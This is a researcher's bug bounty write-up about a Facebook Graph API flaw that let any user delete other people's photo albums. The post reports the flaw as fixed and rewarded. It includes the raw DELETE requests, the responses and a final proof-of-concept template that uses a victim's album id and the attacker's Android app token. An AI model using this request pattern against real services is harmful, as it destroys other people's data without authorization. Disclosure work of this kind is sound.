What if your photos get deleted without your knowledge?

Obviously, that’s very disgusting, isn’t it? Yup this post is regarding a vulnerability found by me which allows a malicious user to delete any photo album on Facebook. Any photo album owned by a user or a page or a group could be deleted.

Graph API is the primary way for developers to read and write the users data. All the Facebook apps of now are using Graph API. In general Graph API requires an access token to read or write user data. Read more about Graph API here.

According to Facebook developers documentation, photo albums cannot be deleted using the album node in Graph API.

I tried to delete one of my photo albums using graph explorer access token.

Request :-

DELETE /518171421550249 HTTP/1.1

Host :  graph.facebook.com 

Content-Length: 245

access_token=CAACEd…..MUZD

 

Response :-

{“error”:{“message”:”(#200) Application does not have the capability to make this API call.”,”type”:”OAuthException”,”code”:200}}

Why? Because this application doesn’t have the capability to delete photo album. But we need to note the error message. It tells us that some other application does have the capability to make this API call 😛

I decided to try it on Facebook for mobile access token because it is a top-level access token which has some extra permissions. Facebook mobile apps use the same Graph API. so took an album id & Facebook for Android access token of mine and tried it.

Request :-

DELETE /518171421550249 HTTP/1.1

Host :  graph.facebook.com 

Content-Length: 245

access_token=<Facebook_for_Android_Access_Token>

 

Response:-

true

Album(518171421550249) got deleted 😀 so whats the next step? Took victim’s album id and tried to delete it. I was very curious to see the result.

Request :-

DELETE /518171421550249 HTTP/1.1

Host :  graph.facebook.com 

Content-Length: 245

access_token=<Facebook_for_Android_Access_Token>

 

Response:-

true

OMG 😀 the album got deleted! So what? I got access to delete all of your Facebook photos (photos which are public or the photos I could see) 😛 lol 😀

Immediately reported this bug to the Facebook security team. They were too fast in identifying this issue and there was a fix in place in less than 2 hours from the acknowledgment of the report.

Read more about getting Facebook for Android access token [Capture Android HTTP/HTTPS Traffic].

Final Proof Of Concept :-

Request :-

DELETE /<Victim’s_photo_album_id> HTTP/1.1

Host :  graph.facebook.com 

Content-Length: 245

access_token=<Your(Attacker)_Facebook_for_Android_Access_Token>

if you aren’t sure about how to do it, please see this video [How I Hacked Your Public Facebook Photos]


Acknowledgement of fix and reward of $12500 USD for reporting this vulnerability.

ack

This vulnerability is completely fixed now.

I thank Facebook Security Team for running bug bounty program and also for quickly fixing this issue 🙂

HALL OF FAME: https://www.facebook.com/whitehat/thanks

Laxman Muthiyah Facebook Whitehat Hacker Updated List 2015

I have also written a detailed article on how to make money online using different ways including bug bounty, those who want to make their livelihood should read the article and start making income online.